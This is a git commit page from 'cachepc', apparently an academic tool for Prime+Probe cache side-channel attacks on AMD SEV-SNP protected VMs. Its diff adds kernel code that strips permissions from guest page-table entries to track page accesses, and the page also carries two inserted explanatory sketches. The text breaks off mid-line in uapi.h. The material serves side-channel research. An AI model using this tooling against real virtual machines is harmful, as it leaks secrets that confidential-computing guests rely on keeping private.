cachepc

Prime+Probe cache-based side-channel attack on AMD SEV-SNP protected virtual machines
git clone https://git.sinitax.com/sinitax/cachepc
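
For context on the description above: Prime+Probe fills ("primes") every way of a cache set with attacker-controlled lines, lets the victim run, then times the reloads ("probes") of those lines; a set that became slower reveals a victim access to it. Below is a minimal, generic userspace sketch of that primitive. It is illustrative only and not taken from this repository: the module performs the attack in the kernel, builds its eviction sets as a randomized linked list of struct cacheline, and counts evictions with performance counters (cachepc_init_pmc / cachepc_read_pmc) rather than timing with rdtscp. The L1 geometry matches the constants introduced in cachepc/cachepc.h (64 sets, 8 ways, 64-byte lines).

/* prime_probe_sketch.c: illustrative only, build with -O0 */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <x86intrin.h>

#define CACHELINE_SIZE 64
#define L1_SETS 64
#define L1_ASSOCIATIVITY 8
#define STRIDE (L1_SETS * CACHELINE_SIZE) /* distance between lines with the same set index */

int
main(void)
{
	volatile uint8_t *buf;
	uint64_t start, delta;
	unsigned int aux;
	int set, way;

	buf = aligned_alloc(4096, L1_ASSOCIATIVITY * STRIDE);
	if (!buf) return 1;

	for (set = 0; set < L1_SETS; set++) {
		/* prime: load one line per way of this set */
		for (way = 0; way < L1_ASSOCIATIVITY; way++)
			buf[way * STRIDE + set * CACHELINE_SIZE] = 1;

		/* victim would execute here */

		/* probe: reload and time; an evicted line misses and
		 * pushes the access time of this set up */
		start = __rdtscp(&aux);
		for (way = 0; way < L1_ASSOCIATIVITY; way++)
			(void) buf[way * STRIDE + set * CACHELINE_SIZE];
		delta = __rdtscp(&aux) - start;

		printf("set %2d: %llu cycles\n", set,
			(unsigned long long) delta);
	}

	free((void *) buf);
	return 0;
}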

commit d505f8bebab8214981a7b4ad63e2595fa497074c
parent 0e89d3b1b7c45ff9a3916b01ab56f177d4b64f8c
Author: Louis Burda <quent.burda@gmail.com>
Date:   Thu,  6 Oct 2022 09:53:35 +0200

Merge sevstep with cachepc dir and merge cachepc headers

Diffstat:
MMakefile | 9+++------
Dcachepc/cache_types.h | 66------------------------------------------------------------------
Mcachepc/cachepc.c | 40++++++++++++++++++++++------------------
Mcachepc/cachepc.h | 87+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++------
Dcachepc/device_conf.h | 29-----------------------------
Mcachepc/kvm.c | 4++--
Acachepc/mmu.c | 135+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Acachepc/sevstep.c | 263+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Rsevstep/sevstep.h -> cachepc/sevstep.h | 0
Mcachepc/uapi.h | 91+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Acachepc/uspt.c | 488+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Rsevstep/uspt.h -> cachepc/uspt.h | 0
Mpatch.diff | 85+++++++++++++++++++++++++++++++++++++++++--------------------------------------
Dsevstep/mmu.c | 135-------------------------------------------------------------------------------
Dsevstep/sevstep.c | 263-------------------------------------------------------------------------------
Dsevstep/uapi.h | 95-------------------------------------------------------------------------------
Dsevstep/uspt.c | 489-------------------------------------------------------------------------------
Mtest/sevstep.c | 2+-
18 files changed, 1130 insertions(+), 1151 deletions(-)
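
The rewritten cachepc/uapi.h below also carries the sevstep page-tracking ioctls (KVM_TRACK_PAGE and the KVM_USPT_* calls with their argument structs). As a rough usage sketch, not taken from this repository: assuming the ioctls are issued against /dev/kvm, where the patched kvm_dev_ioctl() in patch.diff dispatches them, and assuming the poll handler passes KVM_USPT_POLL_EVENT_NO_EVENT through as the ioctl return value, a userspace tool built like the programs under test/ (clang ... -I . from the repository root) might poll and acknowledge page-fault events roughly like this:

/* uspt_poll_sketch.c: illustrative only, assumes a guest VM is
 * already running and that /dev/kvm accepts these ioctls */
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/ioctl.h>

#include <linux/kvm.h>     /* KVMIO */
#include "cachepc/uapi.h"

int
main(void)
{
	track_all_pages_t track;
	page_fault_event_t event;
	ack_event_t ack;
	int fd, ret;

	fd = open("/dev/kvm", O_RDWR);
	if (fd < 0) return 1;

	/* start access-tracking on all guest pages */
	track.track_mode = KVM_PAGE_TRACK_ACCESS;
	if (ioctl(fd, KVM_USPT_TRACK_ALL, &track) < 0)
		return 1;

	/* poll until a tracked page faults, then ack the event
	 * so the blocked vcpu thread may continue */
	while ((ret = ioctl(fd, KVM_USPT_POLL_EVENT, &event))
			== KVM_USPT_POLL_EVENT_NO_EVENT)
		usleep(100);
	if (ret == 0) {
		printf("fault gpa %llx err %x\n",
			(unsigned long long) event.faulted_gpa,
			event.error_code);
		ack.id = event.id;
		ioctl(fd, KVM_USPT_ACK_EVENT, &ack);
	}

	close(fd);
	return 0;
}

The acknowledgement matters because sevstep_uspt_send_and_block() in cachepc/uspt.c spins until the event id is acked or a one second timeout expires.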

diff --git a/Makefile b/Makefile @@ -6,13 +6,10 @@ all: build test/eviction test/access test/kvm test/sev test/sev-es test/sevstep clean: $(MAKE) -C $(LINUX) SUBDIRS=arch/x86/kvm clean -$(LINUX)/arch/x86/kvm/svm/cachepc: +$(LINUX)/arch/x86/kvm/cachepc: ln -sf $(PWD)/cachepc $@ -$(LINUX)/arch/x86/kvm/sevstep: - ln -sf $(PWD)/sevstep $@ - -build: $(LINUX)/arch/x86/kvm/svm/cachepc $(LINUX)/arch/x86/kvm/sevstep +build: $(LINUX)/arch/x86/kvm/cachepc $(MAKE) -C $(LINUX) -j6 M=arch/x86/kvm load: @@ -21,7 +18,7 @@ load: sudo insmod $(LINUX)/arch/x86/kvm/kvm.ko sudo insmod $(LINUX)/arch/x86/kvm/kvm-amd.ko -test/%: test/%.c cachepc/uapi.h sevstep/uapi.h +test/%: test/%.c cachepc/uapi.h clang -o $@ $< -fsanitize=address -I . -Wunused-variable diff --git a/cachepc/cache_types.h b/cachepc/cache_types.h @@ -1,66 +0,0 @@ -#pragma once - -#include "device_conf.h" - -#define SET_MASK(SETS) (((((uintptr_t) SETS) * CACHELINE_SIZE) - 1) ^ (CACHELINE_SIZE - 1)) - -#define REMOVE_PAGE_OFFSET(ptr) ((void *) (((uintptr_t) ptr) & PAGE_MASK)) - -#define GET_BIT(b, i) (((b) >> (i)) & 1) -#define SET_BIT(b, i) ((b) | (1 << (i))) - -/* Operate cacheline flags - * Used flags: - * 32 2 1 0 - * | | ... | cache group initialized | last | first | - */ -#define DEFAULT_FLAGS 0 -#define SET_FIRST(flags) SET_BIT(flags, 0) -#define SET_LAST(flags) SET_BIT(flags, 1) -#define SET_CACHE_GROUP_INIT(flags) SET_BIT(flags, 2) -#define IS_FIRST(flags) GET_BIT(flags, 0) -#define IS_LAST(flags) GET_BIT(flags, 1) -#define IS_CACHE_GROUP_INIT(flags) GET_BIT(flags, 2) - -#define CL_NEXT_OFFSET offsetof(struct cacheline, next) -#define CL_PREV_OFFSET offsetof(struct cacheline, prev) - -typedef enum cache_level cache_level; -typedef enum addressing_type addressing_type; -typedef struct cacheline cacheline; -typedef struct cache_ctx cache_ctx; - -enum cache_level {L1, L2}; -enum addressing_type {VIRTUAL, PHYSICAL}; - -struct cache_ctx { - cache_level cache_level; - addressing_type addressing; - - uint32_t sets; - uint32_t associativity; - uint32_t access_time; - uint32_t nr_of_cachelines; - uint32_t set_size; - uint32_t cache_size; -}; - -struct cacheline { - // Doubly linked list inside same set - // Attention: CL_NEXT_OFFSET and CL_PREV_OFFSET - // must be kept up to date - cacheline *next; - cacheline *prev; - - uint32_t cache_set; - uint32_t cache_line; - uint32_t flags; - - // Unused padding to fill cache line - uint64_t count; - - char padding[24]; -}; - -static_assert(sizeof(struct cacheline) == CACHELINE_SIZE, "Bad cache line struct size"); -static_assert(CL_NEXT_OFFSET == 0 && CL_PREV_OFFSET == 8); diff --git a/cachepc/cachepc.c b/cachepc/cachepc.c @@ -6,6 +6,10 @@ #include <linux/delay.h> #include <linux/ioctl.h> +#define SET_MASK(SETS) (((((uintptr_t) SETS) * CACHELINE_SIZE) - 1) ^ (CACHELINE_SIZE - 1)) + +#define REMOVE_PAGE_OFFSET(ptr) ((void *) (((uintptr_t) ptr) & PAGE_MASK)) + static void cl_insert(cacheline *last_cl, cacheline *new_cl); static void *remove_cache_set(cache_ctx *ctx, void *ptr); static void *remove_cache_group_set(void *ptr); @@ -47,20 +51,20 @@ cachepc_init_pmc(uint8_t index, uint8_t event_no, uint8_t event_mask, } cache_ctx * -cachepc_get_ctx(cache_level cache_level) +cachepc_get_ctx(int cache_level) { cache_ctx *ctx; ctx = kzalloc(sizeof(cache_ctx), GFP_KERNEL); BUG_ON(ctx == NULL); - BUG_ON(cache_level != L1); - if (cache_level == L1) { + BUG_ON(cache_level != L1_CACHE); + if (cache_level == L1_CACHE) { ctx->addressing = L1_ADDRESSING; ctx->sets = L1_SETS; ctx->associativity = L1_ASSOCIATIVITY; 
ctx->access_time = L1_ACCESS_TIME; - } else if (cache_level == L2) { + } else if (cache_level == L2_CACHE) { ctx->addressing = L2_ADDRESSING; ctx->sets = L2_SETS; ctx->associativity = L2_ASSOCIATIVITY; @@ -120,7 +124,7 @@ cachepc_prepare_victim(cache_ctx *ctx, uint32_t set) victim_cl = victim_set; // Free the other lines in the same set that are not used. - if (ctx->addressing == PHYSICAL) { + if (ctx->addressing == PHYSICAL_ADDRESSING) { curr_cl = victim_cl->next; do { next_cl = curr_cl->next; @@ -162,7 +166,7 @@ cachepc_save_msrmts(cacheline *head) curr_cl = head; do { - if (IS_FIRST(curr_cl->flags)) { + if (CL_IS_FIRST(curr_cl->flags)) { BUG_ON(curr_cl->cache_set >= cachepc_msrmts_count); cachepc_msrmts[curr_cl->cache_set] = curr_cl->count; } @@ -178,7 +182,7 @@ cachepc_print_msrmts(cacheline *head) curr_cl = head; do { - if (IS_FIRST(curr_cl->flags)) { + if (CL_IS_FIRST(curr_cl->flags)) { printk(KERN_WARNING "CachePC: Count for cache set %i: %llu\n", curr_cl->cache_set, curr_cl->count); } @@ -238,14 +242,14 @@ prepare_cache_set_ds(cache_ctx *ctx, uint32_t *sets, uint32_t sets_len) do { next_cl = curr_cl->next; - if (IS_FIRST(curr_cl->flags)) { + if (CL_IS_FIRST(curr_cl->flags)) { first_cl_in_sets[curr_cl->cache_set] = curr_cl; } - if (IS_LAST(curr_cl->flags)) { + if (CL_IS_LAST(curr_cl->flags)) { last_cl_in_sets[curr_cl->cache_set] = curr_cl; } - if (ctx->addressing == PHYSICAL && !is_in_arr( + if (ctx->addressing == PHYSICAL_ADDRESSING && !is_in_arr( curr_cl->cache_set / CACHE_GROUP_SIZE, cache_groups, cache_groups_len)) { // Already free all unused blocks of the cache ds for physical @@ -255,7 +259,7 @@ prepare_cache_set_ds(cache_ctx *ctx, uint32_t *sets, uint32_t sets_len) } curr_cl = next_cl; - } while(curr_cl != cache_ds); + } while (curr_cl != cache_ds); // Fix partial cache set ds for (i = 0; i < sets_len; ++i) { @@ -265,7 +269,7 @@ prepare_cache_set_ds(cache_ctx *ctx, uint32_t *sets, uint32_t sets_len) cache_set_ds = first_cl_in_sets[sets[0]]; // Free unused cache lines - if (ctx->addressing == PHYSICAL) { + if (ctx->addressing == PHYSICAL_ADDRESSING) { cachepc_release_ds(ctx, to_del_cls); } @@ -359,9 +363,9 @@ cacheline *build_cache_ds(cache_ctx *ctx, cacheline **cl_ptr_arr) { for (j = 0; j < ctx->nr_of_cachelines; ++j) { curr_cl = cl_ptr_arr_sorted[j]; - if (IS_FIRST(curr_cl->flags)) + if (CL_IS_FIRST(curr_cl->flags)) first_cl_in_sets[curr_cl->cache_set] = curr_cl; - if (IS_LAST(curr_cl->flags)) + if (CL_IS_LAST(curr_cl->flags)) last_cl_in_sets[curr_cl->cache_set] = curr_cl; } @@ -402,10 +406,10 @@ void build_randomized_list_for_cache_set(cache_ctx *ctx, cacheline **cacheline_p curr_cl->prev = cacheline_ptr_arr[idx_map[(len - 1 + i) % len]]; if (idx_map[i] == 0) { - curr_cl->flags = SET_FIRST(DEFAULT_FLAGS); - curr_cl->prev->flags = SET_LAST(DEFAULT_FLAGS); + curr_cl->flags = CL_SET_FIRST(CL_DEFAULT_FLAGS); + curr_cl->prev->flags = CL_SET_LAST(CL_DEFAULT_FLAGS); } else { - curr_cl->flags |= DEFAULT_FLAGS; + curr_cl->flags |= CL_DEFAULT_FLAGS; } } @@ -425,7 +429,7 @@ allocate_cache_ds(cache_ctx *ctx) cl_ptr_arr = kzalloc(ctx->nr_of_cachelines * sizeof(cacheline *), GFP_KERNEL); BUG_ON(cl_ptr_arr == NULL); - BUG_ON(ctx->addressing != VIRTUAL); + BUG_ON(ctx->addressing != VIRTUAL_ADDRESSING); // For virtual addressing, allocating a consecutive chunk of memory is enough cl_arr = cachepc_aligned_alloc(PAGE_SIZE, ctx->cache_size); diff --git a/cachepc/cachepc.h b/cachepc/cachepc.h @@ -1,19 +1,94 @@ #pragma once #include "asm.h" -#include "cache_types.h" #include "uapi.h" -#define 
PMC_KERNEL 2 -#define PMC_USER 1 +#define CACHELINE_SIZE 64 +#define CACHE_GROUP_SIZE (PAGE_SIZE / CACHELINE_SIZE) -#define PMC_HOST 2 -#define PMC_GUEST 1 +#define L1_CACHE 0 +#define L2_CACHE 1 + +#define VIRTUAL_ADDRESSING 0 +#define PHYSICAL_ADDRESSING 1 + +#define L1_ADDRESSING VIRTUAL_ADDRESSING +#define L1_SETS 64 +#define L1_ASSOCIATIVITY 8 +#define L1_ACCESS_TIME 4 + +#define L2_ADDRESSING PHYSICAL_ADDRESSING +#define L2_SETS 512 +#define L2_ASSOCIATIVITY 8 +#define L2_ACCESS_TIME 12 + +#define L3_ADDRESSING PHYSICAL_ADDRESSING +#define L3_SETS 4096 +#define L3_ASSOCIATIVITY 16 +#define L3_ACCESS_TIME 30 + +#define CACHEPC_GET_BIT(b, i) (((b) >> (i)) & 1) +#define CACHEPC_SET_BIT(b, i) ((b) | (1 << (i))) + +/* Operate cacheline flags + * Used flags: + * 32 2 1 0 + * | | ... | cache group initialized | last | first | + */ +#define CL_DEFAULT_FLAGS 0 +#define CL_SET_FIRST(flags) CACHEPC_SET_BIT(flags, 0) +#define CL_SET_LAST(flags) CACHEPC_SET_BIT(flags, 1) +#define CL_SET_GROUP_INIT(flags) CACHEPC_SET_BIT(flags, 2) +#define CL_IS_FIRST(flags) CACHEPC_GET_BIT(flags, 0) +#define CL_IS_LAST(flags) CACHEPC_GET_BIT(flags, 1) +#define CL_IS_GROUP_INIT(flags) CACHEPC_GET_BIT(flags, 2) + +#define CL_NEXT_OFFSET offsetof(struct cacheline, next) +#define CL_PREV_OFFSET offsetof(struct cacheline, prev) + +#define PMC_KERNEL (1 << 1) +#define PMC_USER (1 << 0) + +#define PMC_HOST (1 << 1) +#define PMC_GUEST (1 << 0) + +typedef struct cacheline cacheline; +typedef struct cache_ctx cache_ctx; + +struct cache_ctx { + int cache_level; + int addressing; + + uint32_t sets; + uint32_t associativity; + uint32_t access_time; + uint32_t nr_of_cachelines; + uint32_t set_size; + uint32_t cache_size; +}; + +struct cacheline { + /* Doubly linked cache lines inside same cache set */ + cacheline *next; + cacheline *prev; + + uint32_t cache_set; + uint32_t cache_line; + uint32_t flags; + + uint64_t count; + + /* padding to fill cache line */ + char padding[24]; +}; + +static_assert(sizeof(struct cacheline) == CACHELINE_SIZE, "Bad cache line struct size"); +static_assert(CL_NEXT_OFFSET == 0 && CL_PREV_OFFSET == 8); void cachepc_init_pmc(uint8_t index, uint8_t event_no, uint8_t event_mask, int host_guest, int kernel_user); -cache_ctx *cachepc_get_ctx(cache_level cl); +cache_ctx *cachepc_get_ctx(int cache_level); void cachepc_release_ctx(cache_ctx *ctx); cacheline *cachepc_prepare_ds(cache_ctx *ctx); diff --git a/cachepc/device_conf.h b/cachepc/device_conf.h @@ -1,29 +0,0 @@ -#pragma once - -// TODO: Read from kernel headers - -// General settings -// #define PAGE_SIZE 4096 -#define PROCESSOR_FREQ 2900000000 - -// Cache related settings -#define CACHELINE_SIZE 64 -#define CACHE_GROUP_SIZE (PAGE_SIZE / CACHELINE_SIZE) - -// Addressing: -// - virtual: 0 -// - physical: 1 -#define L1_ADDRESSING 0 -#define L1_SETS 64 -#define L1_ASSOCIATIVITY 8 -#define L1_ACCESS_TIME 4 - -#define L2_ADDRESSING 1 -#define L2_SETS 512 -#define L2_ASSOCIATIVITY 8 -#define L2_ACCESS_TIME 12 - -#define L3_ADDRESSING 1 -#define L3_SETS 4096 -#define L3_ASSOCIATIVITY 16 -#define L3_ACCESS_TIME 30 diff --git a/cachepc/kvm.c b/cachepc/kvm.c @@ -225,7 +225,7 @@ cachepc_kvm_single_eviction_test(void *p) evicted = NULL; cl = head = cachepc_ds; do { - if (IS_FIRST(cl->flags) && cl->count > 0) { + if (CL_IS_FIRST(cl->flags) && cl->count > 0) { evicted = cl; count += cl->count; } @@ -350,7 +350,7 @@ cachepc_kvm_setup_test(void *p) printk(KERN_WARNING "CachePC: Running on core %i\n", cpu); - cachepc_ctx = cachepc_get_ctx(L1); + cachepc_ctx = 
cachepc_get_ctx(L1_CACHE); cachepc_ds = cachepc_prepare_ds(cachepc_ctx); cachepc_kvm_system_setup(); diff --git a/cachepc/mmu.c b/cachepc/mmu.c @@ -0,0 +1,135 @@ +#include "../cachepc/sevstep.h" +#include "../cachepc/uspt.h" + +static void +sevstep_uspt_page_fault_handle(struct kvm_vcpu *vcpu, + struct kvm_page_fault *fault) +{ + const int modes[] = { + KVM_PAGE_TRACK_WRITE, + KVM_PAGE_TRACK_ACCESS, + KVM_PAGE_TRACK_EXEC + }; + uint64_t current_rip; + bool was_tracked; + int have_rip, i; + int send_err; + + was_tracked = false; + for (i = 0; i < sizeof(modes) / sizeof(modes[0]); i++) { + if (kvm_slot_page_track_is_active(vcpu->kvm, + fault->slot, fault->gfn, modes[i])) { + sevstep_untrack_single_page(vcpu, fault->gfn, modes[i]); + was_tracked = true; + } + } + + if (was_tracked) { + have_rip = false; + if (sevstep_uspt_should_get_rip()) + have_rip = sevstep_get_rip_kvm_vcpu(vcpu, &current_rip) == 0; + if (sevstep_uspt_batch_tracking_in_progress()) { + send_err = sevstep_uspt_batch_tracking_save(fault->gfn << PAGE_SHIFT, + fault->error_code, have_rip, current_rip); + if (send_err) { + printk_ratelimited( + "sevstep_uspt_batch_tracking_save failed with %d\n" + "##########################\n", send_err); + } + sevstep_uspt_batch_tracking_handle_retrack(vcpu, fault->gfn); + sevstep_uspt_batch_tracking_inc_event_idx(); + } else { + send_err = sevstep_uspt_send_and_block(fault->gfn << PAGE_SHIFT, + fault->error_code, have_rip, current_rip); + if (send_err) { + printk("sevstep_uspt_send_and_block failed with %d\n" + "##########################\n", send_err); + } + } + } +} + +bool +sevstep_spte_protect(u64 *sptep, bool pt_protect, enum kvm_page_track_mode mode) +{ + u64 spte; + bool flush; + + spte = *sptep; + if (!is_writable_pte(spte) && !(pt_protect && is_mmu_writable_spte(spte))) + return false; + + rmap_printk("spte %p %llx\n", sptep, *sptep); + + if (pt_protect) + spte &= ~EPT_SPTE_MMU_WRITABLE; + + flush = false; + if (mode == KVM_PAGE_TRACK_WRITE) { + spte = spte & ~PT_WRITABLE_MASK; + flush = true; + } else if (mode == KVM_PAGE_TRACK_RESET_ACCESSED) { + spte = spte & ~PT_ACCESSED_MASK; + } else if (mode == KVM_PAGE_TRACK_ACCESS) { + spte = spte & ~PT_PRESENT_MASK; + spte = spte & ~PT_WRITABLE_MASK; + spte = spte & ~PT_USER_MASK; + spte = spte | (0x1ULL << PT64_NX_SHIFT); + flush = true; + } else if (mode == KVM_PAGE_TRACK_EXEC) { + spte = spte | (0x1ULL << PT64_NX_SHIFT); + flush = true; + } else if (mode == KVM_PAGE_TRACK_RESET_EXEC) { + spte = spte & ~(0x1ULL << PT64_NX_SHIFT); + flush = true; + } else { + printk(KERN_WARNING "spte_protect was called with invalid mode" + "parameter %d\n",mode); + } + flush |= mmu_spte_update(sptep, spte); + + return flush; +} +EXPORT_SYMBOL(sevstep_spte_protect); + +bool sevstep_rmap_protect(struct kvm_rmap_head *rmap_head, + bool pt_protect, enum kvm_page_track_mode mode) +{ + u64 *sptep; + struct rmap_iterator iter; + bool flush = false; + + for_each_rmap_spte(rmap_head, &iter, sptep) { + flush |= sevstep_spte_protect(sptep, pt_protect, mode); + } + + return flush; +} +EXPORT_SYMBOL(sevstep_rmap_protect); + +bool +sevstep_kvm_mmu_slot_gfn_protect(struct kvm *kvm, struct kvm_memory_slot *slot, + uint64_t gfn, int min_level, enum kvm_page_track_mode mode) +{ + struct kvm_rmap_head *rmap_head; + bool protected; + int i; + + protected = false; + + if (kvm_memslots_have_rmaps(kvm)) { + for (i = min_level; i <= KVM_MAX_HUGEPAGE_LEVEL; ++i) { + rmap_head = gfn_to_rmap(gfn, i, slot); + protected |= sevstep_rmap_protect(rmap_head, true, mode); + } + } + + if 
(is_tdp_mmu_enabled(kvm)) { + protected |= kvm_tdp_mmu_write_protect_gfn(kvm, + slot, gfn, min_level); + } + + return protected; +} +EXPORT_SYMBOL(sevstep_kvm_mmu_slot_gfn_protect); + diff --git a/cachepc/sevstep.c b/cachepc/sevstep.c @@ -0,0 +1,263 @@ +#include "sevstep.h" +#include "cachepc.h" + +#include "mmu/mmu_internal.h" +#include "mmu.h" + +#include "irq.h" +#include "ioapic.h" +#include "mmu.h" +#include "mmu/tdp_mmu.h" +#include "x86.h" +#include "kvm_cache_regs.h" +#include "kvm_emulate.h" +#include "cpuid.h" +#include "mmu/spte.h" + +#include <linux/kvm_host.h> +#include <linux/types.h> +#include <linux/string.h> +#include <linux/mm.h> +#include <linux/highmem.h> +#include <linux/moduleparam.h> +#include <linux/export.h> +#include <linux/swap.h> +#include <linux/hugetlb.h> +#include <linux/compiler.h> +#include <linux/srcu.h> +#include <linux/slab.h> +#include <linux/sched/signal.h> +#include <linux/uaccess.h> +#include <linux/hash.h> +#include <linux/kern_levels.h> +#include <linux/kthread.h> +#include <linux/sev.h> +#include <linux/mm.h> +#include <linux/smp.h> +#include <linux/vmalloc.h> +#include <linux/slab.h> +#include <linux/sched.h> + +#include "kvm_cache_regs.h" +#include "svm/svm.h" + +struct kvm* main_vm; +EXPORT_SYMBOL(main_vm); + +bool +sevstep_track_single_page(struct kvm_vcpu *vcpu, gfn_t gfn, + enum kvm_page_track_mode mode) +{ + int idx; + bool ret; + struct kvm_memory_slot *slot; + + ret = false; + idx = srcu_read_lock(&vcpu->kvm->srcu); + + if (mode == KVM_PAGE_TRACK_ACCESS) { + pr_warn("Adding gfn: %016llx to access page track pool\n", gfn); + } + + if (mode == KVM_PAGE_TRACK_WRITE) { + pr_warn("Adding gfn: %016llx to write page track pool\n", gfn); + } + + slot = kvm_vcpu_gfn_to_memslot(vcpu, gfn); + if (slot != NULL && !kvm_slot_page_track_is_active(vcpu->kvm,slot, gfn, mode)) { + write_lock(&vcpu->kvm->mmu_lock); + kvm_slot_page_track_add_page(vcpu->kvm, slot, gfn, mode); + write_unlock(&vcpu->kvm->mmu_lock); + ret = true; + } else { + pr_warn("Failed to track %016llx because ", gfn); + if (slot == NULL) { + printk(KERN_CONT "slot was null"); + } + if (kvm_slot_page_track_is_active(vcpu->kvm, slot, gfn, mode)) { + printk(KERN_CONT "page is already tracked"); + } + printk(KERN_CONT "\n"); + } + + srcu_read_unlock(&vcpu->kvm->srcu, idx); + + return ret; +} +EXPORT_SYMBOL(sevstep_track_single_page); + +bool +sevstep_untrack_single_page(struct kvm_vcpu *vcpu, gfn_t gfn, + enum kvm_page_track_mode mode) +{ + int idx; + bool ret; + struct kvm_memory_slot *slot; + + ret = false; + idx = srcu_read_lock(&vcpu->kvm->srcu); + + if (mode == KVM_PAGE_TRACK_ACCESS) { + pr_warn("Removing gfn: %016llx from acess page track pool\n", gfn); + } + if (mode == KVM_PAGE_TRACK_WRITE) { + pr_warn("Removing gfn: %016llx from write page track pool\n", gfn); + } + + slot = kvm_vcpu_gfn_to_memslot(vcpu, gfn); + if (slot != NULL && kvm_slot_page_track_is_active(vcpu->kvm, slot, gfn, mode)) { + write_lock(&vcpu->kvm->mmu_lock); + kvm_slot_page_track_remove_page(vcpu->kvm, slot, gfn, mode); + write_unlock(&vcpu->kvm->mmu_lock); + ret = true; + } else { + pr_warn("Failed to untrack %016llx because ", gfn); + if (slot == NULL) { + printk(KERN_CONT "slot was null"); + } else if (!kvm_slot_page_track_is_active(vcpu->kvm, slot, gfn, mode)) { + printk(KERN_CONT "page track was not active"); + } + printk(KERN_CONT "\n"); + } + + srcu_read_unlock(&vcpu->kvm->srcu, idx); + + return ret; +} +EXPORT_SYMBOL(sevstep_untrack_single_page); + +bool +sevstep_reset_accessed_on_page(struct kvm_vcpu 
*vcpu, gfn_t gfn) +{ + int idx; + bool ret; + struct kvm_memory_slot *slot; + + ret = false; + idx = srcu_read_lock(&vcpu->kvm->srcu); + + slot = kvm_vcpu_gfn_to_memslot(vcpu, gfn); + if (slot != NULL) { + write_lock(&vcpu->kvm->mmu_lock); + // Vincent: The kvm mmu function now requires min_level + // We want all pages to protected so we do PG_LEVEL_4K + // https:// patchwork.kernel.org/project/kvm/patch/20210416082511.2856-2-zhukeqian1@huawei.com/ + sevstep_kvm_mmu_slot_gfn_protect(vcpu->kvm, slot, gfn, + PG_LEVEL_4K, KVM_PAGE_TRACK_RESET_ACCESSED); + write_unlock(&vcpu->kvm->mmu_lock); + ret = true; + } + + srcu_read_unlock(&vcpu->kvm->srcu, idx); + + return ret; +} +EXPORT_SYMBOL(sevstep_reset_accessed_on_page); + +bool +sevstep_clear_nx_on_page(struct kvm_vcpu *vcpu, gfn_t gfn) +{ + int idx; + bool ret; + struct kvm_memory_slot *slot; + + ret = false; + idx = srcu_read_lock(&vcpu->kvm->srcu); + + slot = kvm_vcpu_gfn_to_memslot(vcpu, gfn); + if (slot != NULL) { + write_lock(&vcpu->kvm->mmu_lock); + // Vincent: The kvm mmu function now requires min_level + // We want all pages to protected so we do PG_LEVEL_4K + // https:// patchwork.kernel.org/project/kvm/patch/20210416082511.2856-2-zhukeqian1@huawei.com/ + sevstep_kvm_mmu_slot_gfn_protect(vcpu->kvm, slot, gfn, + PG_LEVEL_4K, KVM_PAGE_TRACK_RESET_EXEC); + write_unlock(&vcpu->kvm->mmu_lock); + ret = true; + } + + srcu_read_unlock(&vcpu->kvm->srcu, idx); + + return ret; +} +EXPORT_SYMBOL(sevstep_clear_nx_on_page); + +long +sevstep_start_tracking(struct kvm_vcpu *vcpu, enum kvm_page_track_mode mode) +{ + struct kvm_memory_slot *slot; + struct kvm_memory_slot *first_memslot; + struct rb_node *node; + u64 iterator, iterat_max; + long count = 0; + int idx; + + // Vincent: Memslots interface changed into a rb tree, see + // here: https:// lwn.net/Articles/856392/ + // and here: https:// lore.kernel.org/all/cover.1632171478.git.maciej.szmigiero@oracle.com/T/#u + // Thus we use instead of + // iterat_max = vcpu->kvm->memslots[0]->memslots[0].base_gfn + // + vcpu->kvm->memslots[0]->memslots[0].npages; + node = rb_last(&(vcpu->kvm->memslots[0]->gfn_tree)); + first_memslot = container_of(node, struct kvm_memory_slot, gfn_node[0]); + iterat_max = first_memslot->base_gfn + first_memslot->npages; + for (iterator = 0; iterator < iterat_max; iterator++) + { + idx = srcu_read_lock(&vcpu->kvm->srcu); + slot = kvm_vcpu_gfn_to_memslot(vcpu, iterator); + if (slot != NULL && !kvm_slot_page_track_is_active(vcpu->kvm, slot, iterator, mode)) { + write_lock(&vcpu->kvm->mmu_lock); + kvm_slot_page_track_add_page(vcpu->kvm, slot, iterator, mode); + write_unlock(&vcpu->kvm->mmu_lock); + count++; + } + srcu_read_unlock(&vcpu->kvm->srcu, idx); + } + + return count; +} +EXPORT_SYMBOL(sevstep_start_tracking); + +long +sevstep_stop_tracking(struct kvm_vcpu *vcpu, enum kvm_page_track_mode mode) +{ + struct kvm_memory_slot *slot; + struct kvm_memory_slot *first_memslot; + struct rb_node *node; + u64 iterator, iterat_max; + long count = 0; + int idx; + + // Vincent: Memslots interface changed into a rb tree, see + // here: https:// lwn.net/Articles/856392/ + // and here: https:// lore.kernel.org/all/cover.1632171478.git.maciej.szmigiero@oracle.com/T/#u + // Thus we use instead of + // iterat_max = vcpu->kvm->memslots[0]->memslots[0].base_gfn + // + vcpu->kvm->memslots[0]->memslots[0].npages; + node = rb_last(&(vcpu->kvm->memslots[0]->gfn_tree)); + first_memslot = container_of(node, struct kvm_memory_slot, gfn_node[0]); + iterat_max = first_memslot->base_gfn + 
first_memslot->npages; + for (iterator=0; iterator < iterat_max; iterator++) + { + idx = srcu_read_lock(&vcpu->kvm->srcu); + slot = kvm_vcpu_gfn_to_memslot(vcpu, iterator); + // Vincent: I think see here + // https:// patchwork.kernel.org/project/kvm/patch/20210924163152.289027-22-pbonzini@redhat.com/ + if (slot != NULL && kvm_slot_page_track_is_active(vcpu->kvm, slot, iterator, mode)) { + write_lock(&vcpu->kvm->mmu_lock); + kvm_slot_page_track_remove_page(vcpu->kvm, slot, iterator, mode); + write_unlock(&vcpu->kvm->mmu_lock); + count++; + } + srcu_read_unlock(&vcpu->kvm->srcu, idx); + } + + return count; +} +EXPORT_SYMBOL(sevstep_stop_tracking); + +int +sevstep_get_rip_kvm_vcpu(struct kvm_vcpu *vcpu, uint64_t *rip) +{ + return 0; +} diff --git a/sevstep/sevstep.h b/cachepc/sevstep.h diff --git a/cachepc/uapi.h b/cachepc/uapi.h @@ -7,3 +7,94 @@ #define CACHEPC_IOCTL_TEST_ACCESS _IOWR(CACHEPC_IOCTL_MAGIC, 0, __u32) #define CACHEPC_IOCTL_TEST_EVICTION 